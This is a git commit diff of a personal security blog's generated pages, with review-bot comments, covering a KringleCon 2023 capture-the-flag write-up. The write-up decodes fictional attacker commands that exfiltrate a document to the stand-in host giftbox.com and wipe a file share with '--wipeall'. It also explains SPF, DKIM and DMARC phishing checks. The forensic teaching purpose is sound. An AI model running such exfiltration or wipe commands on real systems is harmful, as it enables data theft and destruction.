This commit is contained in:
lavafroth
2025-11-14 04:49:23 +00:00
parent 4e7d598832
commit dfa0093d40
16 changed files with 4 additions and 4 deletions

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.


@@ -1 +1 @@
{"version":"1.0.3","languages":{"en-us":{"hash":"en-us_84d7c28ab35c2","wasm":"en-us","page_count":59}}}
{"version":"1.0.3","languages":{"en-us":{"hash":"en-us_cba0324d8ddbf","wasm":"en-us","page_count":59}}}
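Review bot: the only change in this hunk is the rotated pagefind index hash (en-us_84d7c28ab35c2 to en-us_cba0324d8ddbf, with page_count unchanged at 59), which is regenerated build output rather than a deliberate edit; together with the five "Binary file not shown" index fragments above it, this is why a one-word wording tweak becomes a 16-file commit. Consider producing the pagefind index in the deploy step instead of committing it, so reviewers only see the markdown change that actually needs review.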

Binary file not shown.


@@ -1094,10 +1094,10 @@ these are then rearranged in reverse and the trailing <code>-join ''</code> join
</span></span><span style=display:flex><span>print(<span style=color:#e6db74>&#39;&#39;</span><span style=color:#f92672>.</span>join(map(chr, encoded)))
</span></span></code></pre></div><p>This yields the following decoded version of the command:</p><pre tabindex=0><code>downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file
</code></pre><p>Here we notice the attacker using an executable called <code>downwithsanta.exe</code> with the <code>-exfil</code> flag to probably exfiltrate the <code>NaughtyNiceList.docx</code> to <code>giftbox.com</code>.</p><p>Answer: <code>giftbox.com</code></p><h4 id=the-final-step>The final step!</h4><blockquote><p>Wow! You decoded those secret messages with easy! You&rsquo;re a rockstar. It seems like we&rsquo;re getting near the end of this investigation, but we need your help with one more thing&mldr;</p></blockquote><blockquote><p>We know that the attackers stole Santa&rsquo;s naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?</p></blockquote><ol><li>What is the name of the executable the attackers used in the final malicious command?</li></ol><p>Let&rsquo;s decode the final powershell encoded command. As an aside, this coincides to be the last command the attacker ran if we removed the <code>-enc</code> filter.</p><p><img src alt="evidence that it was the last command"></p><p><img src alt></p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>echo QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ<span style=color:#f92672>=</span> | base64 -d
</span></span></code></pre></div><p>This decodes to the following powershell command:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>C:<span style=color:#ae81ff>\W</span>indows<span style=color:#ae81ff>\S</span>ystem32<span style=color:#ae81ff>\d</span>ownwithsanta.exe --wipeall <span style=color:#ae81ff>\\\\</span>NorthPolefileshare<span style=color:#ae81ff>\\</span>c$
</span></span></code></pre></div><p>This decodes to the following powershell command:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-powershell data-lang=powershell><span style=display:flex><span>C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$
</span></span></code></pre></div><p>This shows the attacker running the <code>downwithsanta.exe</code> executable.</p><p>Answer: <code>downwithsanta.exe</code></p><ol start=2><li>What was the command line flag used alongside this executable?</li></ol><p>In the previous decoded command we also noted that the attacker used the <code>--wipeall</code> with the executable.</p><p>Answer: <code>--wipeall</code></p><h4 id=the-flag>The flag</h4><p>After submitting all the answers, we are asked to complete our objective in HHC by submitting the output of the following command:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-py data-lang=py><span style=display:flex><span>print base64_decode_tostring(<span style=color:#e6db74>&#39;QmV3YXJlIHRoZSBDdWJlIHRoYXQgV29tYmxlcw==&#39;</span>)
</span></span></code></pre></div><p>This decodes to <code>Beware the Cube that Wombles</code>. We submit this in our objectives tab and mark this complete.</p><h1 id=film-noir-island-the-blacklight-district>Film Noir Island: The Blacklight District</h1><h2 id=phish-detection>Phish Detection</h2><p><img src=../../kringlecon/2023/phish.avif alt="Intro to the phish detection challenge"></p><blockquote><p>Attention, Digital Defenders! You&rsquo;ve entered the realm of the Phishing Detection Agency, where advanced AI meets human insight. It&rsquo;s been reported that AI has started hallucinating, and it&rsquo;s up to you to discern the reality behind these emails.</p></blockquote><blockquote><p>Key: In the shadow-laden corridors of our menu, the Phishing link casts a crimson hue, a siren&rsquo;s call warning that the number of deceitful emails is amiss. Should our digital sleuthing align perfectly with the cunning of these tricksters, watch as it transforms, glowing an emerald green in triumphant success.</p></blockquote><blockquote><p>Collaboration with ChatNPT: In our ongoing battle against phishing, we&rsquo;ve enlisted ChatNPT to preliminarily flag potential phishing attempts. These flagged emails are stored in the Phishing Folder. However, AI isn&rsquo;t foolproof! It&rsquo;s up to you, the astute investigator, to dive into these emails and confirm their legitimacy. Cross-reference with our DNS records, apply your knowledge of SPF, DKIM, and DMARC, and ensure that only true phishing threats remain in the Phishing Folder. Your keen eye for detail is crucial in outsmarting these digital tricksters!</p></blockquote><blockquote><p>Your mission: Navigate through our virtual vault of emails, employ your knowledge of SPF, DKIM, and DMARC, and identify those deceptive, phishing attempts.</p></blockquote><p><img src=../../kringlecon/2023/phish-00.avif alt></p><p>Welcome to the Geese Islands Email Security Overview. 
This page serves as a guide to understanding the key components of email authentication and security for our domain. Below, you will find detailed information about our SPF, DKIM, and DMARC records the three pillars that fortify our email communications against phishing and spoofing attacks. Each section provides insights into what these records are, their importance in maintaining email integrity, and how they are configured for the utmost security of our digital correspondence.</p><ul><li>SPF Record: Ensures emails are sent from authorized servers.</li></ul><table><thead><tr><th>Domain</th><th>Type</th><th>Value</th></tr></thead><tbody><tr><td>geeseislands.com</td><td>TXT</td><td>v=spf1 a:mail.geeseislands.com -all</td></tr></tbody></table><ul><li>DKIM Record: Verifies that the email message is not forged.</li></ul><table><thead><tr><th>Domain</th><th>Type</th><th>Value</th></tr></thead><tbody><tr><td>geeseislands.com</td><td>TXT</td><td>v=DKIM1;t=s;p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDjtqsLqwecFGF7AmP+Siln86O1v9NOKJw4ZsEHDV5fo0Vjj0qNPyyARKSkDmnIKjnzLGUUQO31Fr+vdZU61IaI9/ZD39WJKaAeX96uQ65mRQqqPVYxPLN5OvuFRmIHJ/TgOkD6z5/7VM7Zs1kw5Qnl04FmOLwWd00D+uNZnj8TCwIDAQAB</td></tr></tbody></table><ul><li>DMARC Record: Specifies how an email receiver should handle emails that fail SPF and DKIM checks.</li></ul><table><thead><tr><th>Domain</th><th>Type</th><th>Value</th></tr></thead><tbody><tr><td>geeseislands.com</td><td>TXT</td><td>v=DMARC1; p=reject; pct=100; rua=mailto:dmarc-reports@geeseislands.com</td></tr></tbody></table><p><img src=../../kringlecon/2023/phish-01.avif alt></p><p>For any of the emails having the DKIM domain (<code>d</code>) parameter <code>mail.geeseislands.com</code>, DMARC as <code>Pass</code> and optionally SPF as <code>pass</code>,
we mark them safe. If the values differ or the domain is entirely different, we mark it as phishing.</p><p>These were all the challenges that I could solve before other matters took precedence. I hope you learned something or at the very least, were amused by my less elegant way of solving things.</p><p>Bye now.</p></section><footer class=post-tags data-pagefind-meta=tags><a href=https://lavafroth.is-a.dev/tags/binary-exploitation class=list-tag>Binary Exploitation</a>
</span></span></code></pre></div><p>This decodes to <code>Beware the Cube that Wombles</code>. We submit this in our objectives tab and mark this complete.</p><h1 id=film-noir-island-the-blacklight-district>Film Noir Island: The Blacklight District</h1><h2 id=phish-detection>Phish Detection</h2><p><img src=../../kringlecon/2023/phish.avif alt="Intro to the phish detection challenge"></p><blockquote><p>Attention, Digital Defenders! You&rsquo;ve entered the realm of the Phishing Detection Agency, where advanced AI meets human insight. It&rsquo;s been reported that AI has started hallucinating, and it&rsquo;s up to you to discern the reality behind these emails.</p></blockquote><blockquote><p>Key: In the shadow-laden corridors of our menu, the Phishing link casts a crimson hue, a siren&rsquo;s call warning that the number of deceitful emails is amiss. Should our digital sleuthing align perfectly with the cunning of these tricksters, watch as it transforms, glowing an emerald green in triumphant success.</p></blockquote><blockquote><p>Collaboration with ChatNPT: In our ongoing battle against phishing, we&rsquo;ve enlisted ChatNPT to preliminarily flag potential phishing attempts. These flagged emails are stored in the Phishing Folder. However, AI isn&rsquo;t foolproof! It&rsquo;s up to you, the astute investigator, to dive into these emails and confirm their legitimacy. Cross-reference with our DNS records, apply your knowledge of SPF, DKIM, and DMARC, and ensure that only true phishing threats remain in the Phishing Folder. Your keen eye for detail is crucial in outsmarting these digital tricksters!</p></blockquote><blockquote><p>Your mission: Navigate through our virtual vault of emails, employ your knowledge of SPF, DKIM, and DMARC, and identify those deceptive, phishing attempts.</p></blockquote><p><img src=../../kringlecon/2023/phish-00.avif alt></p><p>Welcome to the Geese Islands Email Security Overview. 
This page serves as a guide to understanding the key components of email authentication and security for our domain. Below, you will find detailed information about our SPF, DKIM, and DMARC records the three pillars that fortify our email communications against phishing and spoofing attacks. Each section provides insights into what these records are, their importance in maintaining email integrity, and how they are configured for the utmost security of our digital correspondence.</p><ul><li>SPF Record: Ensures emails are sent from authorized servers.<ul><li>Domain: geeseislands.com</li><li>Type: TXT</li><li>Value: v=spf1 a:mail.geeseislands.com -all</li></ul></li><li>DKIM Record: Verifies that the email message is not forged.<ul><li>Domain: geeseislands.com</li><li>Type: TXT</li><li>Value: v=DKIM1;t=s;p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDjtqsLqwecFGF7AmP+Siln86O1v9NOKJw4ZsEHDV5fo0Vjj0qNPyyARKSkDmnIKjnzLGUUQO31Fr+vdZU61IaI9/ZD39WJKaAeX96uQ65mRQqqPVYxPLN5OvuFRmIHJ/TgOkD6z5/7VM7Zs1kw5Qnl04FmOLwWd00D+uNZnj8TCwIDAQAB</li></ul></li><li>DMARC Record: Specifies how an email receiver should handle emails that fail SPF and DKIM checks.<ul><li>Domain: geeseislands.com</li><li>Type: TXT</li><li>Value: v=DMARC1; p=reject; pct=100; rua=mailto:dmarc-reports@geeseislands.com</li></ul></li></ul><p><img src=../../kringlecon/2023/phish-01.avif alt></p><p>For any of the emails having the DKIM domain (<code>d</code>) parameter <code>mail.geeseislands.com</code>, DMARC as <code>Pass</code> and optionally SPF as <code>pass</code>,
we mark them safe. If the values differ or the domain is entirely different, we mark it as phishing.</p><p>These were all the challenges that I could solve before other matters took precedence. I hope you learned something or at the very least, were amused by my crude way of solving things.</p><p>Bye now.</p></section><footer class=post-tags data-pagefind-meta=tags><a href=https://lavafroth.is-a.dev/tags/binary-exploitation class=list-tag>Binary Exploitation</a>
<a href=https://lavafroth.is-a.dev/tags/ci-exploitation class=list-tag>CI Exploitation</a>
<a href=https://lavafroth.is-a.dev/tags/cloud-security class=list-tag>Cloud Security</a>
<a href=https://lavafroth.is-a.dev/tags/cryptography class=list-tag>Cryptography</a>
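Review bot: the intended edit here is the one-word change from "my less elegant way" to "my crude way", but the same replacement also swaps the three Domain/Type/Value tables for the SPF, DKIM and DMARC records into nested `<ul>` lists; please confirm that is deliberate and not a theme or table-rendering regression, since the Value column is exactly what a reader compares against the email headers when deciding phish versus safe, and the tabular form made that easier to scan. A few defects in the surrounding (unchanged) context are worth fixing in the markdown source rather than in this generated HTML: the paragraph "This decodes to the following powershell command:" appears twice in a row, once with a `language-sh` block and once with a `language-powershell` block, and one copy should go; the prose refers to `NaughtyNiceList.docx` while the decoded command reads `NaughtNiceList.docx`, so one of the two is a typo; and "our SPF, DKIM, and DMARC records the three pillars" is missing the punctuation after "records" and is carried over unchanged into the new line.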